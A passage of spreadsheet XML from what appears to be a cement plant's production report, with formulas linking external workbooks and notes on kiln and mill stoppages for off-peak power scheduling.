        <v>35002.0899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>67.3117115384614</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'[14]3'!$M$11+'[14]3'!$M$12+'[14]3'!$M$13+'[14]3'!$M$14+'[14]3'!$M$15+'[14]3'!$M$16+'[14]3'!$M$17+'[14]3'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]3'!$N$11+'[14]3'!$N$12+'[14]3'!$N$13+'[14]3'!$N$14+'[14]3'!$N$15+'[14]3'!$N$16+'[14]3'!$N$17+'[14]3'!$N$18</f>
        <v>1876</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'2'!H62</f>
        <v>4154</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>840147.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]3'!$Q$11+'[14]3'!$Q$12+'[14]3'!$Q$13+'[14]3'!$Q$14+'[14]3'!$Q$15+'[14]3'!$Q$16+'[14]3'!$Q$17+'[14]3'!$Q$18</f>
        <v>1691</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'2'!K62</f>
        <v>5554</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>840026.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]3'!$T$11+'[14]3'!$T$12+'[14]3'!$T$13+'[14]3'!$T$14+'[14]3'!$T$15+'[14]3'!$T$16+'[14]3'!$T$17+'[14]3'!$T$18</f>
        <v>17054.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>68.2185359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]3'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]3'!$M$19+'[14]3'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]3'!$N$19+'[14]3'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'2'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]3'!$Q$19+'[14]3'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'2'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]3'!$T$19+'[14]3'!$T$20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G64+'2'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'2'!K64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G65+'2'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'2'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]3'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:8:00-22:45避峰停机。2#磨:正常。3#磨:8:00-22:15避峰停机。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G66+'2'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'2'!K66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G67+'2'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'2'!K67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'[15]3'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]3'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'2'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]3'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'2'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]3'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]3'!$Q$77</f>
        <v>1#磨8:00-23:00避峰停机:15小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]3'!$D$43+'[15]3'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]3'!$E$43+'[15]3'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'2'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]3'!$H$43+'[15]3'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'2'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]3'!$K$43+'[15]3'!$K$44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'[15]3'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]3'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'2'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]3'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'2'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]3'!$K$45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G71+'2'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'2'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]3'!$Q$80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G72+'2'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'2'!K72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G73+'2'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'2'!K73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G74+'2'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'2'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]3'!$Q$83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G75+'2'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'2'!K75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G76+'2'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'2'!K76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G77+'2'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'2'!K77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G78+'2'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'2'!K78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'[16]3'!$E$7</f>
        <v>509.54</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'2'!H79</f>
        <v>1620.08</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>148748.55</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]3'!$I$7</f>
        <v>610</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'2'!K79</f>
        <v>1525.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>143416.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]3'!$L$7</f>
        <v>4979.36</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.95872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'[16]3'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'2'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]3'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'2'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]3'!$Y$15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G81+'2'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'2'!K81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G82+'2'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'2'!K82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G83+'2'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'2'!K83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G84+'2'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'2'!K84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G85+'2'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'2'!K85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4/31</f>
        <v>0.129032258064516</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45995</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21989.64</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'3'!H5</f>
        <v>73538.72</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6228404.75</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21461.793</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'3'!K5</f>
        <v>90008.516</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6240079.647</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>251151.838</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>67.1528978609625</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]4'!$W$101</f>
        <v>272.458333333333</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]4'!$X$101</f>
        <v>273.260416666667</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]4'!$Y$101</f>
        <v>260.179201143178</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]4'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]4'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]4'!$V$101</f>
        <v>65.0803624260355</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]4'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]4'!$R$101</f>
        <v>96</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]4'!$S$101</f>
        <v>5279.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]4'!$D$23+'[11]4'!$D$17+'[12]4'!$D$17+'[13]4'!$D$25+'[14]4'!$D$8+'[14]4'!$D$15+'[15]4'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]4'!$E$23+'[11]4'!$E$17+'[12]4'!$E$17+'[13]4'!$E$25+'[14]4'!$E$8+'[14]4'!$E$15+'[15]4'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'3'!H6</f>
        <v>948</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>277297.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]4'!$I$23+'[11]4'!$I$17+'[12]4'!$I$17+'[13]4'!$I$25+'[14]4'!$E$23+'[14]4'!$E$30+'[15]4'!$H$7</f>
        <v>676.82</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'3'!K6</f>
        <v>3042.83</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>265240.53</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]4'!$L$23+'[11]4'!$L$17+'[12]4'!$L$17+'[13]4'!$L$25+'[14]4'!$H$23+'[14]4'!$H$30+'[15]4'!$K$7</f>
        <v>30018.01</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]4'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]4'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]4'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]4'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]4'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]4'!$V$102</f>
        <v>35.0739521696253</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]4'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]4'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]4'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]4'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]4'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'3'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]4'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'3'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]4'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]4'!$W$107</f>
        <v>115.6382079459</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]4'!$X$107</f>
        <v>122.573839662447</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]4'!$Y$107</f>
        <v>131.773394143405</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]4'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]4'!$U$107</f>
        <v>44.4375</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]4'!$V$107</f>
        <v>31.1648175542406</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]4'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]4'!$R$107</f>
        <v>42.66</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]4'!$S$107</f>
        <v>2528.09</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]4'!$D$27+'[11]4'!$D$18+'[13]4'!$D$26+'[14]4'!$D$10+'[14]4'!$D$17+'[15]4'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]4'!$E$27+'[11]4'!$E$18+'[13]4'!$E$26+'[14]4'!$E$10+'[14]4'!$E$17+'[15]4'!$E$9</f>
        <v>845</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'3'!H8</f>
        <v>4339</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>529875.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]4'!$I$27+'[11]4'!$I$18+'[13]4'!$I$26+'[14]4'!$E$25+'[14]4'!$E$32+'[15]4'!$H$9</f>
        <v>2544.56</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'3'!K8</f>
        <v>10111.97</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>517856.68</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]4'!$L$27+'[11]4'!$L$18+'[13]4'!$L$26+'[14]4'!$H$25+'[14]4'!$H$32+'[15]4'!$K$9</f>
        <v>36106.93</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]4'!$W$108</f>
        <v>126.649528706084</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]4'!$X$108</f>
        <v>127.535258562794</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]4'!$Y$108</f>
        <v>127.426478461044</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]4'!$T$108</f>
        <v>48.625</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]4'!$U$108</f>
        <v>46.53125</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]4'!$V$108</f>
        <v>27.6321499013806</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]4'!$Q$108</f>
        <v>11.67</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]4'!$R$108</f>
        <v>44.67</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]4'!$S$108</f>
        <v>2241.52</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]4'!$D$24+'[11]4'!$D$19+'[12]4'!$D$20+'[13]4'!$D$27+'[14]4'!$D$11+'[14]4'!$D$18+'[15]4'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]4'!$E$24+'[11]4'!$E$19+'[12]4'!$E$20+'[13]4'!$E$27+'[14]4'!$E$11+'[14]4'!$E$18+'[15]4'!$E$10</f>
        <v>18912</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'3'!H9</f>
        <v>53454</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4188842.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]4'!$I$24+'[11]4'!$I$19+'[12]4'!$I$20+'[13]4'!$I$27+'[14]4'!$E$26+'[14]4'!$E$33+'[15]4'!$H$10</f>
        <v>14151.443</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'3'!K9</f>
        <v>58003.546</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4155482.357</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]4'!$L$24+'[11]4'!$L$19+'[12]4'!$L$20+'[13]4'!$L$27+'[14]4'!$H$26+'[14]4'!$H$33+'[15]4'!$K$10</f>
        <v>106316.166</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]4'!$W$109</f>
        <v>274.173913043478</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]4'!$X$109</f>
        <v>275.147799430698</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]4'!$Y$109</f>
        <v>271.37467180054</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]4'!$T$109</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]4'!$U$109</f>
        <v>47.5729166666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]4'!$V$109</f>
        <v>35.0253944773175</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]4'!$Q$109</f>
        <v>11.5</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]4'!$R$109</f>
        <v>45.67</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]4'!$S$109</f>
        <v>2841.26</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]4'!$D$25+'[11]4'!$D$20+'[12]4'!$D$21+'[13]4'!$D$28+'[14]4'!$D$12+'[14]4'!$D$19+'[15]4'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]4'!$E$25+'[11]4'!$E$20+'[12]4'!$E$21+'[13]4'!$E$28+'[14]4'!$E$12+'[14]4'!$E$19+'[15]4'!$E$11</f>
        <v>480</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'3'!H10</f>
        <v>8028</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>925555.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]4'!$I$25+'[11]4'!$I$20+'[12]4'!$I$21+'[13]4'!$I$28+'[14]4'!$E$27+'[14]4'!$E$34+'[15]4'!$H$11</f>
        <v>2868.7</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'3'!K10</f>
        <v>13069.36</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>910298.08</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]4'!$L$25+'[11]4'!$L$20+'[12]4'!$L$21+'[13]4'!$L$28+'[14]4'!$H$27+'[14]4'!$H$34+'[15]4'!$K$11</f>
        <v>56165.582</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]4'!$W$110</f>
        <v>364.179104477612</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]4'!$X$110</f>
        <v>364.179104477612</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]4'!$Y$110</f>
        <v>268.873994928981</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]4'!$T$110</f>
        <v>2.79166666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]4'!$U$110</f>
        <v>0.697916666666667</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]4'!$V$110</f>
        <v>34.0819773175542</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]4'!$Q$110</f>
        <v>0.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]4'!$R$110</f>
        <v>0.67</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]4'!$S$110</f>
        <v>2764.73</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]4'!$D$26+'[11]4'!$D$21+'[12]4'!$D$19+'[13]4'!$D$29+'[14]4'!$D$13+'[14]4'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]4'!$E$26+'[11]4'!$E$21+'[12]4'!$E$19+'[13]4'!$E$29+'[14]4'!$E$13+'[14]4'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'3'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]4'!$I$26+'[11]4'!$I$21+'[12]4'!$I$19+'[13]4'!$I$29+'[14]4'!$E$28+'[14]4'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'3'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]4'!$L$26+'[11]4'!$L$21+'[12]4'!$L$19+'[13]4'!$L$29+'[14]4'!$H$28+'[14]4'!$H$35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7212.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'3'!H12</f>
        <v>28654.0000000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4971045.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>20345.369</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'3'!K12</f>
        <v>64945.82</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5094052.196</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>343644.88500005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>78.2790170842939</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]4'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]4'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]4'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]4'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
